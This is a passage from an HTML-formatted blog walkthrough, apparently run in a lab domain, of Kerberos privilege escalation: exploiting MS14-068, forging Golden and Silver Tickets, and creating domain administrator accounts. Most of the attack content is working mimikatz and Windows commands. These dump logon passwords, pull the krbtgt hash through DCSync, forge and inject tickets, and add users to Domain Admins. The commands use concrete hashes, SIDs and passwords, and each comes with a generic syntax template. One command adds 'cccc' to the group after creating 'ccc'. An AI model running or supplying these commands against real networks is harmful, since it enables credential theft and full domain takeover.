&lt;pre class="highlight shell"&gt;&lt;code&gt;ms14-068.exe &lt;span class="nt"&gt;-u&lt;/span&gt; &amp;lt;domain_user&amp;gt;@&amp;lt;domain&amp;gt; &lt;span class="nt"&gt;-p&lt;/span&gt; &amp;lt;password&amp;gt; &lt;span class="nt"&gt;-s&lt;/span&gt; &amp;lt;user_SID&amp;gt; &lt;span class="nt"&gt;-d&lt;/span&gt; &amp;lt;domain_controller&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Within mimikatz, the existing Kerberos ticket cache is purged and the forged ticket is imported:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight powershell"&gt;&lt;code&gt;&lt;span class="n"&gt;mimikatz&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="c"&gt;# kerberos::purge&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="n"&gt;mimikatz&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="c"&gt;# kerberos::ptc &amp;lt;path_to_ticket_file&amp;gt;&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmkloxfa1l96j1e4y3bct.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmkloxfa1l96j1e4y3bct.png" alt=" " width="644" height="260"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The command &lt;code&gt;dir \\scene.cyberpeace.com\c$&lt;/code&gt; now executes successfully, demonstrating that domain administrator privileges have been obtained.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmjkbrf5mn6wabc2xvexb.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmjkbrf5mn6wabc2xvexb.png" alt=" " width="530" height="194"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;A new domain administrator account, &lt;code&gt;aaa&lt;/code&gt;, is created:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;net user aaa Qwe123... /add /domain
net group &lt;span class="s2"&gt;"Domain Admins"&lt;/span&gt; aaa /add /domain
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  2. Forging a Golden Ticket
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Prerequisites for forging a Golden Ticket&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Domain name&lt;/li&gt;
&lt;li&gt;Domain SID value&lt;/li&gt;
&lt;li&gt;NTLM hash of the &lt;code&gt;krbtgt&lt;/code&gt; account&lt;/li&gt;
&lt;li&gt;Arbitrary username to be forged&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Logging in as the domain administrator &lt;code&gt;aaa&lt;/code&gt; and executing &lt;code&gt;whoami&lt;/code&gt; confirms the identity.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3raa2yei5ssykds6wvfb.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3raa2yei5ssykds6wvfb.png" alt=" " width="220" height="40"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The NTLM hash of &lt;code&gt;krbtgt&lt;/code&gt; is extracted using the following mimikatz commands:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;mimikatz&lt;span class="o"&gt;(&lt;/span&gt;commandline&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="c"&gt;# privilege::debug&lt;/span&gt;
mimikatz&lt;span class="o"&gt;(&lt;/span&gt;commandline&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="c"&gt;# lsadump::dcsync /domain:cyberpeace.com /all /csv&lt;/span&gt;
mimikatz&lt;span class="o"&gt;(&lt;/span&gt;commandline&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="c"&gt;# lsadump::dcsync /domain:cyberpeace.com /user:krbtgt&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftj0p56h58vab3coyys8r.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftj0p56h58vab3coyys8r.png" alt=" " width="590" height="326"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The SID of the &lt;code&gt;krbtgt&lt;/code&gt; account is displayed in the output.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5937ui5jej3ouknplvh3.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5937ui5jej3ouknplvh3.png" alt=" " width="535" height="216"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Mimikatz is then employed to generate the Golden Ticket and save it as a &lt;code&gt;.kirbi&lt;/code&gt; file:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;mimikatz.exe &lt;span class="s2"&gt;"kerberos::golden /admin:system /domain:cyberpeace.com /sid:S-1-5-21-97341123-1865264218-933115267 /krbtgt:95972cdf7b8dde854e74c1871f6d80a0 /ticket:ticket.kirbi"&lt;/span&gt; &lt;span class="nb"&gt;exit&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;/admin&lt;/code&gt; : forged username&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;/domain&lt;/code&gt; : domain name&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;/sid&lt;/code&gt; : domain SID (the user SID obtained from &lt;code&gt;whoami /user&lt;/code&gt; with its final component, the RID after the last hyphen, removed)&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;/krbtgt&lt;/code&gt; : NTLM hash of &lt;code&gt;krbtgt&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;/ticket&lt;/code&gt; : name of the generated ticket file&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnefe10t7ap6ooruk9e7l.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnefe10t7ap6ooruk9e7l.png" alt=" " width="800" height="145"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  3. Using the Golden Ticket (Creating a Domain Admin Account from a Standard Domain Account)
&lt;/h4&gt;

&lt;p&gt;The attacker logs into the domain with an ordinary user account. Using mimikatz, the previously generated &lt;code&gt;ticket.kirbi&lt;/code&gt; is loaded into memory:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight powershell"&gt;&lt;code&gt;&lt;span class="n"&gt;mimikatz&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="c"&gt;# kerberos::purge&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="n"&gt;mimikatz&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="c"&gt;# kerberos::ptt ticket.kirbi&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftkredn349ltvr6jas0md.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftkredn349ltvr6jas0md.png" alt=" " width="365" height="112"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;At this point, an attempt to create a domain administrator account named &lt;code&gt;ccc&lt;/code&gt; succeeds.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8u6sfitdwhd6bbcbau19.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8u6sfitdwhd6bbcbau19.png" alt=" " width="642" height="143"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Silver Ticket
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Principle
&lt;/h3&gt;

&lt;p&gt;If the Golden Ticket represents a forged TGT, then the Silver Ticket corresponds to a forged Service Ticket (ST). During the third stage of Kerberos authentication, the Client presents the ST together with &lt;code&gt;Authenticator3&lt;/code&gt; to a service hosted on a particular server. The server decrypts the ST using its own Master Key (derived from the service account’s hash) to obtain the Session Key. It then decrypts &lt;code&gt;Authenticator3&lt;/code&gt; with that Session Key to verify the Client’s identity. If verification succeeds, the Client is granted access to the designated service.  &lt;/p&gt;

&lt;p&gt;Thus, if an attacker knows the NTLM hash of the service account associated with the target server, a valid ST can be forged without any communication with the KDC. However, such a forged ticket is functional only for the specific service for which it was crafted.&lt;/p&gt;

&lt;h3&gt;
  
  
  Characteristics
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt;Does not require interaction with the KDC.&lt;/li&gt;
&lt;li&gt;Requires the NTLM hash of the target service account.&lt;/li&gt;
&lt;/ol&gt;

&lt;h3&gt;
  
  
  Detailed Procedure
&lt;/h3&gt;

&lt;h4&gt;
  
  
  1. Forging Credentials to Escalate Privileges of a Domain User
&lt;/h4&gt;

&lt;p&gt;Again, the attack begins from a local &lt;code&gt;Administrator&lt;/code&gt; account on a domain‑joined host.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgwosz5hqezyi0lkafqko.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgwosz5hqezyi0lkafqko.png" alt=" " width="252" height="43"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The command &lt;code&gt;net config workstation&lt;/code&gt; reveals the domain name as &lt;code&gt;cyberpeace&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgxog8l3qubdjyzk3iq55.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgxog8l3qubdjyzk3iq55.png" alt=" " width="591" height="226"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The domain controller hostname &lt;code&gt;scene&lt;/code&gt; is obtained with &lt;code&gt;nltest /dsgetdc:domain&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fb8zwg41o4l7y5ccvpxe2.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fb8zwg41o4l7y5ccvpxe2.png" alt=" " width="427" height="145"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Mimikatz is executed with administrator rights:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight batchfile"&gt;&lt;code&gt;&lt;span class="kd"&gt;mimikatz&lt;/span&gt;&lt;span class="err"&gt;.exe&lt;/span&gt; &lt;span class="s2"&gt;"privilege::debug"&lt;/span&gt; &lt;span class="s2"&gt;"sekurlsa::logonpasswords"&lt;/span&gt; &lt;span class="s2"&gt;"exit"&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="kd"&gt;log&lt;/span&gt;.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The log file shows a domain user account, &lt;code&gt;Hellen&lt;/code&gt;, with the password &lt;code&gt;Hellen1818&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Faezbgtmz4pe0j1aiw77t.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Faezbgtmz4pe0j1aiw77t.png" alt=" " width="231" height="42"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;After logging in as &lt;code&gt;Hellen&lt;/code&gt;, &lt;code&gt;whoami&lt;/code&gt; confirms the user context.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0iwiprewrle71spfc8m5.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0iwiprewrle71spfc8m5.png" alt=" " width="663" height="143"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The presence of the MS14‑068 vulnerability is verified.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flbnarwtykc58pb3nnp3r.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flbnarwtykc58pb3nnp3r.png" alt=" " width="385" height="57"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Access to the administrative share is initially denied.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fy1qugmrm1xqo1gx93bn1.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fy1qugmrm1xqo1gx93bn1.png" alt=" " width="366" height="41"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The exploit tool and mimikatz are uploaded, and the user’s SID is retrieved.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fymlbh63by3een5guzmxe.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fymlbh63by3een5guzmxe.png" alt=" " width="554" height="99"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;A ticket is forged with MS14‑068:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight batchfile"&gt;&lt;code&gt;&lt;span class="kd"&gt;MS14&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="m"&gt;068&lt;/span&gt;.exe &lt;span class="na"&gt;-u &lt;/span&gt;&lt;span class="kd"&gt;Hellen&lt;/span&gt;@cyberpeace.com &lt;span class="na"&gt;-p &lt;/span&gt;&lt;span class="kd"&gt;Hellen1818&lt;/span&gt; &lt;span class="na"&gt;-s &lt;/span&gt;&lt;span class="kd"&gt;S&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="m"&gt;1&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="m"&gt;5&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="m"&gt;21&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="m"&gt;2718660907&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="m"&gt;658632824&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="m"&gt;2072795563&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="m"&gt;1110&lt;/span&gt; &lt;span class="na"&gt;-d &lt;/span&gt;&lt;span class="kd"&gt;DomainControl&lt;/span&gt;.cyberpeace.com
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The generic syntax is:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight batchfile"&gt;&lt;code&gt;&lt;span class="kd"&gt;ms14&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="m"&gt;068&lt;/span&gt;.exe &lt;span class="na"&gt;-u &lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="kd"&gt;domain_user&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;@&amp;lt;domain&amp;gt; &lt;span class="na"&gt;-p &lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="kd"&gt;password&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="na"&gt;-s &lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="kd"&gt;user_SID&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="na"&gt;-d &lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="kd"&gt;domain_controller&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Inside mimikatz, the old tickets are purged and the forged ticket is imported:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight powershell"&gt;&lt;code&gt;&lt;span class="n"&gt;mimikatz&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="c"&gt;# kerberos::purge&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="n"&gt;mimikatz&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="c"&gt;# kerberos::ptc &amp;lt;path_to_ticket_file&amp;gt;&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8g0hmbz2vefi1qkev9mk.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8g0hmbz2vefi1qkev9mk.png" alt=" " width="639" height="287"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The command &lt;code&gt;dir \\scene.cyberpeace.com\c$&lt;/code&gt; now succeeds, indicating domain administrator privileges.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhpw4964pc6l8w0c4z88g.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhpw4964pc6l8w0c4z88g.png" alt=" " width="486" height="223"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;A domain administrator account &lt;code&gt;ccc&lt;/code&gt; is created:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;net user ccc Qwe1234 /add /domain
net group &lt;span class="s2"&gt;"Domain Admins"&lt;/span&gt; cccc /add /domain
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdhuz1c8s0rdu8o4ce7mq.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdhuz1c8s0rdu8o4ce7mq.png" alt=" " width="637" height="138"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  2. Forging a Silver Ticket
&lt;/h4&gt;

&lt;p&gt;Logging in as the newly created domain administrator, mimikatz is run with administrator privileges to extract the domain SID and the NTLM hash of the target service account:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight batchfile"&gt;&lt;code&gt;&lt;span class="kd"&gt;mimikatz&lt;/span&gt;&lt;span class="err"&gt;.exe&lt;/span&gt; &lt;span class="s2"&gt;"privilege::debug"&lt;/span&gt; &lt;span class="s2"&gt;"sekurlsa::logonpasswords"&lt;/span&gt; &lt;span class="s2"&gt;"exit"&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="kd"&gt;log&lt;/span&gt;.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5rh08cpw0rfcsasrnko1.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5rh08cpw0rfcsasrnko1.png" alt=" " width="595" height="372"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Mimikatz and the extracted hash are then copied to a domain‑joined machine and used from a local account there. After purging the existing ticket cache, the silver ticket is forged and passed directly into the current session with the following command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;kerberos::golden /domain:cyberpeace.com /sid:S-1-5-21-2718660907-658632824-2072795563 /target:scene.cyberpeace.com /service:cifs /rc4:9a68826fdc2811f20d1f73a471ad7b9a /user:test /ptt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The general usage pattern is:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight powershell"&gt;&lt;code&gt;&lt;span class="n"&gt;kerberos::golden&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;/domain:&lt;/span&gt;&lt;span class="err"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nx"&gt;domain&lt;/span&gt;&lt;span class="err"&gt;&amp;gt;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;/sid:&lt;/span&gt;&lt;span class="err"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nx"&gt;domain_SID&lt;/span&gt;&lt;span class="err"&gt;&amp;gt;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;/target:&lt;/span&gt;&lt;span class="err"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nx"&gt;target_server&lt;/span&gt;&lt;span class="err"&gt;&amp;gt;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;/service:&lt;/span&gt;&lt;span class="err"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nx"&gt;service_type&lt;/span&gt;&lt;span class="err"&gt;&amp;gt;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;/rc4:&lt;/span&gt;&lt;span class="err"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nx"&gt;NTLM_hash&lt;/span&gt;&lt;span class="err"&gt;&amp;gt;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;/user:&lt;/span&gt;&lt;span class="err"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nx"&gt;username&lt;/span&gt;&lt;span class="err"&gt;&amp;gt;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;/ptt&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;code&gt;&amp;lt;username&amp;gt;&lt;/code&gt; may be chosen arbitrarily.&lt;/p&gt;

